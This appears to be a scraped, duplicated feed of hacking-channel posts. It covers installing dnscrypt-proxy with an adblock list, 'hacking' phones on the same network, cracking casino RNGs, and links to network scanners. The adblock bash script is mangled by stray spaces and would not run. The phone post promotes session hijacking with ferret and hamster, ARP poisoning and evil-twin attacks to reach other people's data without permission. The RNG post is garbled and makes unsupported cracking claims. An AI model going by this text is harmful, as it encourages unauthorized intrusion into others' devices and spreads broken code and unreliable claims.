$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml
First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:
listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outgoing traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## = example.com
## ads. *
## ads * .example. *
## ads * .example [0-9] *. com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
Installing adblocker list for dnscrypt proxy
Here is a small bash script to download and update the list.
#! / bin / bash
DEST = "/ etc / dnscrypt-proxy / blacklist.txt"
#
# Blocks both adware + malware
# See for other lists https://github.com/StevenBlack/hosts
SRC = "https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts"
TMP_B_FILE = "$ (mktemp)"
TMP_B_FILE_SORTED = "$ (mktemp)"
wget --timeout = 10 --tries = 5 -qO- "$ {SRC}" | grep -Ev "(localhost)" | grep -Ev "#" | sed -E "s / (0.0.0.0 | 127.0.0.1 | 255.255.255.255) //" >> "$ {TMP_B_FILE}"
awk '/ ^ [^ #] / {print $ 1}' "$ {TMP_B_FILE}" | sort -u> "$ {TMP_B_FILE_SORTED}"
cp -f "$ {TMP_B_FILE_SORTED}" "$ DEST"
rm -f "$ {TMP_B_FILE}" "$ {TMP_B_FILE_SORTED}"
Running the script:
# ./update-adblocker.sh
π¦Checking the list:
# more /etc/dnscrypt-proxy/blacklist.txt
Be sure to run the update-adblocker.sh script daily to get an updated list of hosts.
> Add a new cron job like this:
@daily /path/to/update-adblocker.sh
Besides ads and malware , you can block fake news , gambling, porn, and social media !
π¦How to enable dnscrypt proxy service
Use the systemctl command to enable the dnscrypt-proxy service on Linux:
$ sudo systemctl enable dnscrypt-proxy
Service start:
$ sudo systemctl start dnscrypt-proxy
Service check:
$ sudo systemctl status dnscrypt-proxy
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π‘ How to install dnscrypt proxy with ad blocker on Linux
#REQUESTED
1) Debian/Ubuntu :
$ sudo apt install dnscrypt-proxy
## Alpine Linux
$ sudo apk add dnscrypt-proxy
## CentOS / RHEL ΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°ΡΠ΅Π»ΠΈ:
$ sudo yum install dnscrypt-proxy
## Arch Linux ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΠΉΡΠ΅ pacman ##
$ sudo pacman -S dnscrypt-proxy
## OpenSUSE/SUSE Linux
$ sudo zypper in dnscrypt-proxy
## Fedora dnf ##
$ sudo dnf install dnscrypt-proxy
Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.
> For instance:
$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml
First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:
listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outgoing traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## = example.com
## ads. *
## ads * .example. *
## ads * .example [0-9] *. com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
Installing adblocker list for dnscrypt proxy
Here is a small bash script to download and update the list.
#! / bin / bash
DEST = "/ etc / dnscrypt-proxy / blacklist.txt"
#
# Blocks both adware + malware
# See for other lists https://github.com/StevenBlack/hosts
SRC = "https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts"
TMP_B_FILE = "$ (mktemp)"
TMP_B_FILE_SORTED = "$ (mktemp)"
wget --timeout = 10 --tries = 5 -qO- "$ {SRC}" | grep -Ev "(localhost)" | grep -Ev "#" | sed -E "s / (0.0.0.0 | 127.0.0.1 | 255.255.255.255) //" >> "$ {TMP_B_FILE}"
awk '/ ^ [^ #] / {print $ 1}' "$ {TMP_B_FILE}" | sort -u> "$ {TMP_B_FILE_SORTED}"
cp -f "$ {TMP_B_FILE_SORTED}" "$ DEST"
rm -f "$ {TMP_B_FILE}" "$ {TMP_B_FILE_SORTED}"
Running the script:
# ./update-adblocker.sh
π¦Checking the list:
# more /etc/dnscrypt-proxy/blacklist.txt
Be sure to run the update-adblocker.sh script daily to get an updated list of hosts.
> Add a new cron job like this:
@daily /path/to/update-adblocker.sh
Besides ads and malware , you can block fake news , gambling, porn, and social media !
π¦How to enable dnscrypt proxy service
Use the systemctl command to enable the dnscrypt-proxy service on Linux:
$ sudo systemctl enable dnscrypt-proxy
Service start:
$ sudo systemctl start dnscrypt-proxy
Service check:
$ sudo systemctl status dnscrypt-proxy
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - StevenBlack/hosts: π Consolidating and extending hosts files from several well-curated sources. Optionally pick extensionsβ¦
π Consolidating and extending hosts files from several well-curated sources. Optionally pick extensions for porn, social media, and other categories. - StevenBlack/hosts
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK PHONE ON SAME NETWORK - BY IP :
1) ONE of the flashy method can be session hijacking .
In computer science, session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer sessionβsometimes also called a session keyβto gain unauthorized access to information or services in a computer system. You can view their contents over the network if they arenβt using https protocol .
2) This hack doesnβt need password , just capture ethernet packets using any packet capture tools like ferret(kali linux ) and then analyse it with session analyzing tool like (hamster).This way you need not access their device and can know lots of things .
3) Other conventional methods can be sending payloads , arp-poisoning , password-bruteforcing .
Even evil-twin attack may work wonders.
will post methodes related to this next
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACK PHONE ON SAME NETWORK - BY IP :
1) ONE of the flashy method can be session hijacking .
In computer science, session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer sessionβsometimes also called a session keyβto gain unauthorized access to information or services in a computer system. You can view their contents over the network if they arenβt using https protocol .
2) This hack doesnβt need password , just capture ethernet packets using any packet capture tools like ferret(kali linux ) and then analyse it with session analyzing tool like (hamster).This way you need not access their device and can know lots of things .
3) Other conventional methods can be sending payloads , arp-poisoning , password-bruteforcing .
Even evil-twin attack may work wonders.
will post methodes related to this next
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a random number generator?
1) The random number generator (RNG) is the modern equivalent of rolling dice or shuffling cards.
2) This form of randomization has now been mathematically transformed into a computer algorithm that works to generate a set of random numbers that (should) be free of any pattern.
3) When it comes to casino games, lotteries, sweepstakes and similar games, RNGs take the form of blocks of code hidden in software that provide a "chance" in gambling.
π¦Random RNG and Pseudo RNG
RNGs in casino games and slot machines are actually not random, but rather "pseudo".
1) The difference between the two is determined by the ways in which the numbers are generated.
2) In the case of a radial RNG, number generation is usually a completely unpredictable physical phenomenon (such as radio or atmospheric noise), fueled by entropy and explained only by quantum mechanics.
3) N Sevda RNG, on the other hand, using a mathematical algorithm or otherwise generated by a computer.
4) The key difference is that with the help of computer algorithms the entire result could be technically predicted if all the initial values ββwere known.
Hence ... "pseudo".
As in everything related to mathematics, if there is an equation, then it is not at all random.
π¦So, is it possible to hack an RNG?
Random number generators are quite complex.
As you can see, they include complex mathematical code that is hidden in software, encrypted, and hidden in computers monitored by CCTV cameras.
You must be a complete WRONG.. if you think you can hack the Random Number Generator.
In fact, you really only need a small piece of information to crack this code.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is a random number generator?
1) The random number generator (RNG) is the modern equivalent of rolling dice or shuffling cards.
2) This form of randomization has now been mathematically transformed into a computer algorithm that works to generate a set of random numbers that (should) be free of any pattern.
3) When it comes to casino games, lotteries, sweepstakes and similar games, RNGs take the form of blocks of code hidden in software that provide a "chance" in gambling.
π¦Random RNG and Pseudo RNG
RNGs in casino games and slot machines are actually not random, but rather "pseudo".
1) The difference between the two is determined by the ways in which the numbers are generated.
2) In the case of a radial RNG, number generation is usually a completely unpredictable physical phenomenon (such as radio or atmospheric noise), fueled by entropy and explained only by quantum mechanics.
3) N Sevda RNG, on the other hand, using a mathematical algorithm or otherwise generated by a computer.
4) The key difference is that with the help of computer algorithms the entire result could be technically predicted if all the initial values ββwere known.
Hence ... "pseudo".
As in everything related to mathematics, if there is an equation, then it is not at all random.
π¦So, is it possible to hack an RNG?
Random number generators are quite complex.
As you can see, they include complex mathematical code that is hidden in software, encrypted, and hidden in computers monitored by CCTV cameras.
You must be a complete WRONG.. if you think you can hack the Random Number Generator.
In fact, you really only need a small piece of information to crack this code.
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network/ip scanners & More :
https://istumbler.net
http://kismac-ng.org
https://www.kismetwireless.net
https://github.com/uoaerg/wavemon
https://github.com/ghostop14/sparrow-wifi
http://a.farproc.com/wifi-analyzer
https://apkpure.com/network-scanner/com.easymobile.lan.scanner
https://apkpure.com/net-scan/com.wwnd.netmapper
https://apkpure.com/network-scan/com.bitsworking.networkscanner.app
π¦ from wireshark:
https://www.youtube.com/watch?v=EUmHdVeBBNc
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Network/ip scanners & More :
https://istumbler.net
http://kismac-ng.org
https://www.kismetwireless.net
https://github.com/uoaerg/wavemon
https://github.com/ghostop14/sparrow-wifi
http://a.farproc.com/wifi-analyzer
https://apkpure.com/network-scanner/com.easymobile.lan.scanner
https://apkpure.com/net-scan/com.wwnd.netmapper
https://apkpure.com/network-scan/com.bitsworking.networkscanner.app
π¦ from wireshark:
https://www.youtube.com/watch?v=EUmHdVeBBNc
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
iStumbler Labs
Handcrafted Tools for Better Computing